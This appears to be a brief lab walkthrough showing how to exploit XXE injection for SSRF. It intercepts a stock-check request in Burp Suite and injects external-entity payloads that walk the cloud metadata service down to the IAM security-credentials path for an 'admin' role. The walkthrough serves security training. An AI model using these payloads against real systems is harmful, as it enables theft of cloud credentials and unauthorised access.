Exploiting XXE to perform SSRF attacks

Let's check the stock of one of the products.

Since we are proxying the requests through Burp Suite, we can go to Proxy > HTTP History to view the request.

We can see that the request contains an XML entity.

Let's forward this request to the Repeater for further modification.

Once in the Repeater tab, declare the following internal entity after the XML prologue:

<!DOCTYPE test 
[<!ENTITY test SYSTEM "http://169.254.169.254/">]
>

Let's add the latest endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/">]

Let's add the meta-data endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/">]

Let's add the iam endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/iam/">]

Let's add the credentials endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]

Let's add the admin endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/">]

We have solved the lab.